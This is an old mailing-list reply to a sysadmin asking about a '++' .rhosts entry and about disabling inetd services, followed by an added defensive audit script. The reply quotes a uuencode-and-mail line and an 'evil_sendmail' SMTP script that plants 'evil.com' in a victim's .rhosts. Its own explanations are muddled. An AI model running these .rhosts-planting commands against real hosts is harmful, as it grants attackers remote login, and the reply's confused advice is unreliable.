On Mon, Jan 08, 2001 at 10:24:09AM +0900,
Sun Young Geun (선영근) ([EMAIL PROTECTED])
wrote:
> I'm operating ACE/SERVER.
> ACE/server is configured as master and slave.
>
> I have some questions about security.
>
> 1. I found something like this in the .rhosts file.
>
> #cat .rhosts
> ++
gnnii !!!
In ~/.bash_history? The hash is a root command. If you found this in an unowned
group user or in a daemon log, please remove all users' .rhosts files,
hosts.equiv too. Very not good!!
evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail [EMAIL PROTECTED]
e.g.
But I don't know what ACE/SERVER is. If evil doesn't know what your operating
system is, it is not possible to attack like this. You must have other logs. In Unix,
that is dangerous.
> Do they use r-commands when master and slave communicate with each other?
> If not, is there any problem without the .rhosts file?
> I want to delete the .rhosts file because it is very vulnerable in security.
>
> 2. I want to comment out all services except for the telnet service.
> The inetd.conf file allows services.
> If I open only the telnet service, is there any problem in ACE/SERVER?
% cat evil_sendmail
telnet victim.com 25 << EOSM
rcpt to: /home/zen/.rhosts
mail from: zen
data
random garbage
.
rcpt to: /home/zen/.rhosts
mail from: zen
data
evil.com
.
quit
EOSM
>
> Please reply to me a.s.a.p.
>
> Happy new year !!
Happy New Year :-)
--
A hitchhiker is a young woman, generally pretty and scantily dressed, who
is on your road when you are with your wife.
Woody ALLEN
--- gpg key: http://bermudos.free.fr/.key/pubring.asc
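A defensive check for the two questions in this thread, added here as an example and not part of the original mail: it flags wildcard entries in .rhosts / hosts.equiv files and lists services still enabled in inetd.conf outside an allowlist. The function names, host names and sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original mail): defensive audit of r-command
# trust files and of the services left enabled in inetd.conf.

# Print entries of the .rhosts / hosts.equiv files given as arguments whose
# host or user field is the "+" wildcard; "++" is flagged too because the
# listing in the mail shows it that way. Exit status 0 means "found some".
wildcard_trust() {
    awk '
        /^[ \t]*(#|$)/ { next }                    # comments, blank lines
        $1 == "+" || $2 == "+" || $1 == "++" { print FILENAME ": " $0; hit = 1 }
        END { exit !hit }
    ' "$@"
}

# Print the service names still enabled in the inetd.conf given as $1 that
# are not in the space-separated allowlist $2. Exit status 0 means "found some".
unexpected_services() {
    awk -v allow="$2" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        /^[ \t]*(#|$)/ { next }                    # commented-out services
        !($1 in ok) { print $1; hit = 1 }
        END { exit !hit }
    ' "$1"
}

# Constructed sample files, so the script runs without touching the system.
demo=$(mktemp -d)
printf '++\n' > "$demo/rhosts.bad"
printf '# trusted peer\nslave.example.com zen\n' > "$demo/rhosts.ok"
cat > "$demo/inetd.conf" <<'EOF'
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
shell  stream tcp nowait root /usr/sbin/tcpd in.rshd
#login stream tcp nowait root /usr/sbin/tcpd in.rlogind
EOF

wildcard_trust "$demo/rhosts.bad" "$demo/rhosts.ok"   # flags rhosts.bad only
unexpected_services "$demo/inetd.conf" "telnet"       # reports "shell"
rm -rf "$demo"
```

On a real host, pass the files located with `find /home -name .rhosts` together with `/etc/hosts.equiv` to the first function, and the live `/etc/inetd.conf` to the second.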